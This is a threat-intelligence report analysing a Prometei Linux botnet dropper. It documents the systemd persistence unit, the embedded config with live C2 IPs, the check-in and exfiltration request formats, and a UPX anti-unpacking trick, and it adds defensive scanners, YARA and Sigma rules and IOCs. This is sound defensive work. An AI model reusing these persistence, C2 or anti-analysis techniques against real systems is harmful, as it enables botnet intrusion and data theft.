prometei: e6ce5dd2d422 — UPX-packed ELF64 with systemd service persistence and HTTP CGI C2
Executive Summary
Prometei Linux botnet dropper. UPX-packed ELF64, statically linked, stripped. On execution it stages a systemd unit file for boot persistence, writes a bot GUID to /etc/CommId, and beacons to a hard-coded IP via HTTP GET to /cgi-bin/p.cgi. The embedded JSON config reveals a parent ID and hostname, suggesting a hierarchical botnet structure. First Linux ELF in the corpus with observed systemd persistence.
What It Is
| Field | Value |
|---|---|
| SHA-256 | e6ce5dd2d422c2a0657d1315d12c836e17a6636e378b3c6c1ed57bf1bfebe469 |
| File type | ELF 64-bit LSB executable, x86-64, statically linked, no section header ^[file.txt] |
| Size | 436,122 bytes |
| Packer | UPX 4.24 (stub present); `upx -d` fails with NotPackedException, likely due to post-pack tampering ^[binwalk.txt]^,^[strings.txt] |
| Compiler | GCC (Ubuntu 9.3.0) ^[strings.txt] |
| Stripped | Yes ^[rabin2-info.txt] |
| Family | Prometei (MalwareBazaar tagged Prometei / wraith) ^[mb-metadata.json] |
How It Works
Persistence — systemd unit installation
The sample drops a systemd service file to `/etc/systemd/system/multi-user.target.wants/uplugplay.service` during detonation. The content observed by CAPE: ^[cape-report.json]

```ini
[Unit]
Description=UPlugPlay
After=multi-user.target
[Service]
Type=forking
ExecStart=/usr/sbin/uplugplay
[Install]
WantedBy=multi-user.target
```
It also writes an empty stub to /sbin/uplugplay (0 bytes in sandbox, suggesting it failed to copy itself or requires elevated privileges). ^[cape-report.json]
Bot identity
A 16-byte bot GUID 8O4AUIE1TB74B3GF is written to /etc/CommId. This string is reused as the i= parameter in all HTTP C2 requests. ^[cape-report.json]
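The persistence and identity artefacts above are simple to triage from a live host or a mounted image. The following is an added example written for this report, not the sample's code or anything from the CAPE tooling: it walks `*.wants/` directories under a filesystem root, resolves each unit's `ExecStart` target, flags targets that are missing or zero bytes (the `uplugplay` case, where the stub was dropped empty), and reads `/etc/CommId`. The fixture it builds in a temporary directory is constructed to mirror the observed drop; the benign `goodd.service` unit is invented for contrast.

```python
"""Offline triage of systemd unit persistence of the kind this sample leaves behind.

Added example, not code from the report or the sample. Point `scan_wants()` at "/"
on a live host or at the mount point of an image; the demo fixture is constructed.
"""
import os
import re
import tempfile

UNIT_DIRS = ("etc/systemd/system", "usr/lib/systemd/system", "lib/systemd/system")
# systemd allows prefix characters (-, @, +, !, :) before the program path in ExecStart=.
EXECSTART_RE = re.compile(r"^\s*ExecStart\s*=\s*([-@+!:]*)(\S+)", re.MULTILINE)


def exec_start_target(unit_text):
    """Program path from the first ExecStart= line, or None when the unit has none."""
    m = EXECSTART_RE.search(unit_text)
    return m.group(2) if m else None


def scan_wants(root):
    """Assess every *.service found under <root>/<unit dir>/*.wants/."""
    findings = []
    for rel in UNIT_DIRS:
        base = os.path.join(root, rel)
        if not os.path.isdir(base):
            continue
        for wants in sorted(os.listdir(base)):
            wants_dir = os.path.join(base, wants)
            if not wants.endswith(".wants") or not os.path.isdir(wants_dir):
                continue
            for name in sorted(os.listdir(wants_dir)):
                if not name.endswith(".service"):
                    continue
                unit_path = os.path.join(wants_dir, name)
                with open(unit_path, encoding="utf-8", errors="replace") as fh:
                    target = exec_start_target(fh.read())
                # Resolve relative to the scanned root so a mounted image works too.
                abs_target = os.path.join(root, target.lstrip("/")) if target else None
                size = os.path.getsize(abs_target) if abs_target and os.path.isfile(abs_target) else None
                findings.append({
                    "unit": "/" + os.path.relpath(unit_path, root),
                    "exec_start": target,
                    "target_size": size,
                    # A real daemon's ExecStart target exists and has content; the sample's
                    # unit pointed at a binary that was absent or a 0-byte stub.
                    "suspicious": target is None or size in (None, 0),
                })
    return findings


def read_commid(root):
    """Bot GUID from /etc/CommId, or None if the file is absent."""
    path = os.path.join(root, "etc", "CommId")
    if not os.path.isfile(path):
        return None
    with open(path, encoding="ascii", errors="replace") as fh:
        return fh.read().strip()


def build_fixture(root):
    """Constructed filesystem mirroring the CAPE-observed drop plus one benign unit."""
    wants = os.path.join(root, "etc/systemd/system/multi-user.target.wants")
    os.makedirs(wants)
    os.makedirs(os.path.join(root, "usr/sbin"))
    with open(os.path.join(wants, "uplugplay.service"), "w") as fh:
        fh.write("[Unit]\nDescription=UPlugPlay\nAfter=multi-user.target\n"
                 "[Service]\nType=forking\nExecStart=/usr/sbin/uplugplay\n"
                 "[Install]\nWantedBy=multi-user.target\n")
    open(os.path.join(root, "usr/sbin/uplugplay"), "wb").close()  # 0-byte stub, as observed
    with open(os.path.join(wants, "goodd.service"), "w") as fh:  # invented benign unit
        fh.write("[Service]\nExecStart=-/usr/sbin/goodd --foreground\n")
    with open(os.path.join(root, "usr/sbin/goodd"), "wb") as fh:
        fh.write(b"#!/bin/sh\nexit 0\n")
    with open(os.path.join(root, "etc", "CommId"), "w") as fh:
        fh.write("8O4AUIE1TB74B3GF")


def run_demo():
    """Build the fixture in a temp dir, scan it and return the results."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return {"units": scan_wants(root), "commid": read_commid(root)}


if __name__ == "__main__":
    result = run_demo()
    for f in result["units"]:
        flag = "SUSPICIOUS" if f["suspicious"] else "ok        "
        print(flag, f["unit"], "->", f["exec_start"], "size", f["target_size"])
    print("CommId:", result["commid"])
```

On a merged-`/usr` host `/sbin` is a symlink to `/usr/sbin`, so the stub at `/sbin/uplugplay` and the `ExecStart=/usr/sbin/uplugplay` path resolve to the same file; the scanner follows whatever `ExecStart` names, which is what systemd would execute.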
Embedded configuration
A cleartext JSON configuration block is embedded in the data section: ^[strings.txt:1381]
```json
{"config":1,"id":"s2Ta8i16ELb3m7G0","enckey":"txfRz4/zE1Q+I0/KOnqUUTXzTpOI0AoAnnFSrVehG+IRbzw4OInJjpNWHir1P1DXbIxhl3eXH5l8skb6mJ6XNGUCA+Gb8YB5m5ufocG44ytulyyRpSHL65H+uP4IF/jTBREJBaNm18ZuHpnuRdVt81ht/thX4v5nqksi8Mm7bpA=","ParentId":"F74IRD93V5OPV46BHV","ip":"152.42.151.72","ParentHostname":"Servidor"}
```
The ParentId, ParentHostname (Servidor), and enckey fields indicate a peer-to-parent or multi-tier botnet topology. The ip field (152.42.151.72) does not match the sandbox C2 destination (103.176.111.176), suggesting either a fallback hierarchy or rotation mechanism.
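Because the configuration sits in cleartext, it can be carved straight out of the binary (or a memory dump) without defeating the packer. The following is an added example, not the report's or the sample's code: it finds the `{"config":` marker the strings output shows, parses the object with a raw JSON decoder so the trailing binary data does not matter, and summarises the fields that go into an IOC table. The byte blob is constructed (the recovered JSON wrapped in junk); the interpretation of the decoded `enckey` size is an assumption noted in the comment, not something the report establishes.

```python
"""Carve the cleartext Prometei-style JSON config out of a binary image.

Added example, not code from the report. The blob below is constructed: the JSON
recovered from the sample, padded with junk bytes to stand in for a .data dump.
"""
import base64
import json
import re

CONFIG_MARKER = re.compile(r'\{"config":')

SAMPLE_CONFIG = (
    '{"config":1,"id":"s2Ta8i16ELb3m7G0","enckey":"txfRz4/zE1Q+I0/KOnqUUTXzTpOI0AoAnnFSrVehG+'
    'IRbzw4OInJjpNWHir1P1DXbIxhl3eXH5l8skb6mJ6XNGUCA+Gb8YB5m5ufocG44ytulyyRpSHL65H+uP4IF/'
    'jTBREJBaNm18ZuHpnuRdVt81ht/thX4v5nqksi8Mm7bpA=","ParentId":"F74IRD93V5OPV46BHV",'
    '"ip":"152.42.151.72","ParentHostname":"Servidor"}'
)
SAMPLE_BLOB = (b"\x00\x7fELF\x02\x01" + bytes(range(256)) + SAMPLE_CONFIG.encode()
               + b"\x00/etc/CommId\x00\x90" * 3)


def extract_configs(blob):
    """Every JSON object in `blob` that starts with {"config": and parses cleanly."""
    text = blob.decode("latin-1")          # 1:1 byte-to-char, so offsets stay byte offsets
    decoder = json.JSONDecoder()
    found = []
    for m in CONFIG_MARKER.finditer(text):
        try:
            obj, end = decoder.raw_decode(text, m.start())
        except ValueError:
            continue                        # marker hit inside non-JSON data
        found.append({"offset": m.start(), "length": end - m.start(), "config": obj})
    return found


def summarise(cfg):
    """Flatten the fields an analyst records, decoding the base64 enckey blob."""
    raw = base64.b64decode(cfg.get("enckey", ""), validate=True)
    return {
        "bot_id": cfg.get("id"),
        "parent_id": cfg.get("ParentId"),
        "parent_hostname": cfg.get("ParentHostname"),
        "ip": cfg.get("ip"),
        # The decoded value is far longer than any raw AES key. A 1024-bit blob is what
        # an RSA-1024-wrapped key would look like, but that is an assumption: the report
        # does not establish how enckey is used.
        "enckey_bits": len(raw) * 8,
    }


if __name__ == "__main__":
    for hit in extract_configs(SAMPLE_BLOB):
        print(f"config at offset {hit['offset']} ({hit['length']} bytes):")
        for k, v in summarise(hit["config"]).items():
            print(f"  {k:16} {v}")
```

Decoding as `latin-1` rather than UTF-8 is deliberate: every byte maps to exactly one character, so the offsets the decoder reports are real file offsets and no byte sequence can raise a decode error.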
C2 communication
Two HTTP GET requests observed outbound to 103.176.111.176:80 via /cgi-bin/p.cgi: ^[cape-report.json]
- Beacon / check-in: `GET /cgi-bin/p.cgi?r=50&i=8O4AUIE1TB74B3GF`
- Exfiltration: `GET /cgi-bin/p.cgi?add=<base64>&i=8O4AUIE1TB74B3GF&h=<hash>&enckey=<aeskey>`
The `add=` query parameter carries base64-encoded data. Attempted decoding yields only partially intelligible output (fragments such as `info {E$`), and the value does not decode cleanly as base64, suggesting the payload is encrypted or that the enckey is used for symmetric wrapping.
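The two request shapes above, together with the empty User-Agent and HTTP/1.0 noted under C2 Infrastructure, are enough to hunt for this traffic in web-server or proxy logs. The following is an added example, not part of the report: it parses combined-format log lines, keys on the `/cgi-bin/p.cgi` path, the 16-character alphanumeric `i=` GUID and the `r=` (check-in) or `add=` (exfiltration) parameters, and reports whether the `add=` value is clean base64. The log lines are constructed to mirror the observed requests; the source addresses, timestamps and the `add=` contents are invented.

```python
"""Flag Prometei-style /cgi-bin/p.cgi check-ins and exfil requests in access logs.

Added example, not code from the report. SAMPLE_LOG is constructed.
"""
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

COMBINED_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) '
    r'(?P<proto>HTTP/\d\.\d)" (?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
GUID_RE = re.compile(r"^[A-Z0-9]{16}$")
C2_PATH = "/cgi-bin/p.cgi"

SAMPLE_LOG = """\
10.0.0.23 - - [29/May/2026:10:01:02 +0000] "GET /cgi-bin/p.cgi?r=50&i=8O4AUIE1TB74B3GF HTTP/1.0" 200 12 "-" ""
10.0.0.23 - - [29/May/2026:10:01:03 +0000] "GET /cgi-bin/p.cgi?add=aW5mbyB7RSQAAP8=&i=8O4AUIE1TB74B3GF&h=deadbeef&enckey=QUJD HTTP/1.0" 200 0 "-" ""
10.0.0.24 - - [29/May/2026:10:01:04 +0000] "GET /cgi-bin/p.cgi?add=aW5mbyB7RSQ%%%&i=8O4AUIE1TB74B3GF HTTP/1.0" 200 0 "-" ""
10.0.0.9 - - [29/May/2026:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [29/May/2026:10:01:06 +0000] "GET /cgi-bin/p.cgi?r=50 HTTP/1.1" 404 0 "-" "curl/8.0"
"""


def query_params(query):
    """Split a query string without turning '+' into a space: '+' is base64 data here,
    which is why parse_qs() is not used."""
    params = {}
    for part in query.split("&"):
        if not part:
            continue
        k, _, v = part.partition("=")
        params.setdefault(unquote(k), []).append(unquote(v))
    return params


def assess(line):
    """Return a finding dict for a /cgi-bin/p.cgi request, else None."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["uri"])
    if parts.path != C2_PATH:
        return None
    q = query_params(parts.query)
    guid = q.get("i", [""])[0]
    finding = {
        "src": m["src"],
        "ts": m["ts"],
        "guid": guid,
        "guid_ok": bool(GUID_RE.match(guid)),
        "kind": "exfil" if "add" in q else ("checkin" if "r" in q else "other"),
        "empty_ua_http10": m["ua"] == "" and m["proto"] == "HTTP/1.0",
        "add_clean_b64": None,
    }
    if "add" in q:
        try:
            base64.b64decode(q["add"][0], validate=True)
            finding["add_clean_b64"] = True
        except (binascii.Error, ValueError):
            finding["add_clean_b64"] = False   # matches the sample: not clean base64
    # Three independent traits; 3/3 is the full fingerprint, 1/3 is worth a look only.
    finding["score"] = sum([finding["guid_ok"], finding["kind"] != "other",
                            finding["empty_ua_http10"]])
    return finding


def scan(log_text):
    """All findings for a block of log lines, in order."""
    return [f for f in (assess(line) for line in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['score']}/3 {f['kind']:8} src={f['src']} guid={f['guid'] or '-'} "
              f"add_clean_b64={f['add_clean_b64']}")
```

The last sample line shows why the score matters: a stray `r=50` probe from `curl` to the same path hits only one of the three traits, whereas the bot's own requests hit all three.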
Hosts file modification
/etc/hosts was modified during detonation (563-byte file written). Exact delta unavailable in CAPE report; likely DNS redirection or sinkholing to prevent competing infections or security updates. ^[cape-report.json]
Decompiled Behavior
Ghidra analysis is limited due to UPX packing and full stripping: only 1 function recovered with 0 instructions in the initial auto-analysis. ^[ghidra metadata] Radare2 entrypoint (0x015de3d0) shows a short initialisation stub that calls fcn.015de668 (likely UPX decompression) followed by a second function fcn.015de445. Without unpacking the binary, meaningful pseudo-C is not obtainable. The behaviour described above is derived entirely from dynamic CAPE observation and string artefacts.
C2 Infrastructure
| IOC | Type | Notes |
|---|---|---|
| 103.176.111.176:80 | C2 primary | HTTP GET /cgi-bin/p.cgi ^[cape-report.json] |
| 152.42.151.72 | Config fallback / parent | Hard-coded in embedded JSON only; no sandbox traffic observed ^[strings.txt:1381] |
| 8O4AUIE1TB74B3GF | Bot GUID | Written to /etc/CommId, reused in C2 i= parameter ^[cape-report.json] |
The HTTP User-Agent was empty; requests used HTTP/1.0 ^[cape-report.json].
Interesting Tidbits
- The `ParentHostname` value is `Servidor` (Portuguese/Spanish for "Server"), suggesting a Portuguese-language operator environment or a default naming convention in the builder — consistent with Prometei's historically Eastern European operator attribution. ^[strings.txt:1381]
- UPX header strings claim version 4.24, yet `upx -d` rejected the file as "not packed by UPX," indicating post-packing tampering or a non-standard UPX fork used to hinder unpacking. ^[strings.txt]^,^[binwalk.txt]
- Two temp files (`/tmp/tmp.ZZdlfX1liD` and `/tmp/tmp.Mk6tiBLVtX`) were dropped; the latter is 465 bytes of high-entropy data, likely an encrypted task file or payload block. ^[cape-report.json]
- NTP traffic to `185.125.190.56:123` and DNS to `1.1.1.1` were observed; the NTP destination is Canonical's NTP pool (Ubuntu default) and therefore not inherently malicious, but time-sync is often a prerequisite for certificate validation or task scheduling.
How To Mess With It (Homelab Replication)
- Obtain a standard UPX-packed binary (e.g., compile a simple C HTTP client with `gcc -static -s`, then `upx` it).
- Verify the packing signature with `strings`: it should show `UPX!` and `This file is packed with the UPX executable packer`.
- Attempt `upx -d` to confirm standard decompression works.
- Tamper with the UPX stub (e.g., patch the magic bytes) and observe `upx -d` fail; this approximates the anti-unpack trick seen here.
- For a full replication of the behavioural signature: write a systemd unit to `/etc/systemd/system/multi-user.target.wants/test.service`, run `systemctl daemon-reload && systemctl enable test.service`, and capture the auditd / syslog events.
Deployable Signatures
YARA
```yara
rule prometei_linux_elf {
    meta:
        description = "Prometei Linux ELF UPX-packed botnet dropper"
        author = "PacketPursuit SOC"
        date = "2026-05-29"
        sha256 = "e6ce5dd2d422c2a0657d1315d12c836e17a6636e378b3c6c1ed57bf1bfebe469"
    strings:
        $upx1 = "UPX!" ascii
        $upx2 = "$Info: This file is packed with the UPX executable packer" ascii
        $s1 = "\"config\"" ascii
        $s2 = "\"enckey\"" ascii
        $s3 = "uplugplay" ascii
        $s4 = "/cgi-bin/p.cgi" ascii
        $s5 = "/etc/CommId" ascii
        $s6 = "[Unit]" ascii
        $s7 = "multi-user.target" ascii
    condition:
        uint32(0) == 0x464c457f and
        ($upx1 or $upx2) and
        3 of ($s*)
}
```
Sigma — systemd service drop
```yaml
title: Prometei Systemd Service Drop
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
status: experimental
description: Detects creation of Prometei-related systemd service files or suspicious ExecStart paths.
logsource:
  product: linux
  category: file_event
detection:
  selection_prometei:
    TargetFilename|contains:
      - 'uplugplay.service'
      - '/etc/systemd/system/multi-user.target.wants/uplugplay'
  selection_generic:
    TargetFilename|endswith: '.service'
    TargetFilename|contains:
      - '/etc/systemd/system/'
      - '/usr/lib/systemd/system/'
  condition: selection_prometei or selection_generic
falsepositives:
  - Legitimate package installation (filter by UID / package manager context)
level: high
tags:
  - attack.persistence
  - attack.t1543.002
```
IOC list
| Type | Value |
|---|---|
| SHA-256 | e6ce5dd2d422c2a0657d1315d12c836e17a6636e378b3c6c1ed57bf1bfebe469 |
| MD5 | 5a50692be4e0dcf9f59697fce073b10f |
| SHA-1 | 68e05b05f39ff26a209d30738328ed5494b8c2ed |
| C2 IP | 103.176.111.176:80 |
| Config IP | 152.42.151.72 |
| Bot GUID | 8O4AUIE1TB74B3GF |
| Dropped service | /etc/systemd/system/multi-user.target.wants/uplugplay.service |
| Dropped binary stub | /sbin/uplugplay |
| Bot ID file | /etc/CommId |
| Temp staging | /tmp/tmp.ZZdlfX1liD, /tmp/tmp.Mk6tiBLVtX |
Behavioral Fingerprint
An ELF64 Linux executable packed with UPX 4.24 (stub may be tampered to prevent standard unpacking), which drops a systemd unit file named uplugplay.service into /etc/systemd/system/multi-user.target.wants/ pointing to /usr/sbin/uplugplay, writes a 16-character bot GUID to /etc/CommId, modifies /etc/hosts, and then performs unencrypted HTTP GET requests to 103.176.111.176:80 via /cgi-bin/p.cgi using the bot GUID as the i= parameter and a base64 add= payload for exfiltration.
Detection Signatures (MITRE ATT&CK)
| Technique ID | Name | Evidence |
|---|---|---|
| T1543.002 | Create or Modify System Process: Systemd Service | Dropped uplugplay.service to multi-user.target.wants ^[cape-report.json] |
| T1071.001 | Application Layer Protocol: Web Protocols | HTTP GET beacon to 103.176.111.176/cgi-bin/p.cgi ^[cape-report.json] |
| T1041 | Exfiltration Over C2 Channel | Base64 add= parameter in second HTTP request ^[cape-report.json] |
| T1070.004 | Indicator Removal: File Deletion | Temp files created in /tmp/; /etc/hosts modified ^[cape-report.json] |
| T1057 | Process Discovery | /proc/self/exe referenced in strings ^[strings.txt] |
| T1083 | File and Directory Discovery | /etc/locp and /proc paths in strings ^[strings.txt] |
References
- MalwareBazaar sample page: https://malwarebazaar.abuse.ch/sample/e6ce5dd2d422c2a0657d1315d12c836e17a6636e378b3c6c1ed57bf1bfebe469
- CISA Alert AA21-076A (Prometei): https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-076a
- prometei — entity page
- systemd-service-persistence-linux — procedure page
Provenance
- `file.txt` — ExifTool / file(1) output
- `strings.txt` — `strings -n 6` output (UPX strings, config JSON, filesystem paths)
- `binwalk.txt` — Binwalk surface scan
- `rabin2-info.txt` — radare2 `iI` header summary
- `cape-report.json` — CAPE sandbox full JSON report (network, dropped files, HTTP requests)
- `mb-metadata.json` — MalwareBazaar metadata (family tags Prometei / wraith)
- `dynamic-analysis.md` — CAPE sandbox summary (network hosts, dropped file paths)